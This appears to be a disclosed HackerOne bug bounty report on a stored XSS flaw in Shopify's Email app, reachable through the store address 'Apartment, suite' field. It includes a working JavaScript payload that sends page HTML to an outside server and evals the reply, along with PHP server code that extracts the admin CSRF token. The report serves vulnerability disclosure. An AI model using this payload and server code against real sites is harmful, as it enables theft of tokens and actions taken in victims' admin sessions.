Shopify: XSS within Shopify Email App - Admin

2020-05-10T02:11:36
ID H1:869831
Type hackerone
Reporter francisbeaudoin
Modified 2020-09-14T19:56:53

Description

The Shopify Email Application is vulnerable to XSS

A user with only Settings https://hackerone.myshopify.com/admin/settings/general access can inject html within the Apartment, suite, etc. (optional) of the Store address section that will then be displayed in the Shopify Email Template edition

Steps to reproduce

  1. Open Settings page
  2. Insert malicious HTML within the Apartment, suite, etc. (optional) field. Please note that the inserted code is a bit too complex for nothing but was just trying out if it was possible to "bypass" the 255 characters limit , which is possible. (Code snippet can be found below). ██████
  3. Install Shopify Email App
  4. Select a template that displays Apartment, suite, etc. (optional) field {F822194}

Javascript code used

<img src="a:" onerror="var t=setTimeout;t(function(){var b=function(d){var x=new XMLHttpRequest;t(function(){eval(x.responseText)},2000);x.open('POST','https://fbs.ninja');x.send(d)};window.parent.postMessage(b(document.head.innerHTML),'*');},2000)"/>

PHP code of https://fbs.ninja used in the XMLHttpRequest

``` <? header("Access-Control-Allow-Origin: *");

$html = file_get_contents('php://input');

$doc = DOMDocument::loadHTML($html); $xpath = new DOMXPath($doc); $query = "//meta[@name='csrf-token']"; $entries = $xpath->query($query);

$csrf = ""; foreach ($entries as $entry) { $csrf = $entry->getAttribute('content'); break; }

$request = "alert('CSRF Token: " . $csrf . "');";

echo $request;

?>

Impact

An attacker could at least trigger requests to the https://email.shopifyapps.com/graphql endpoint.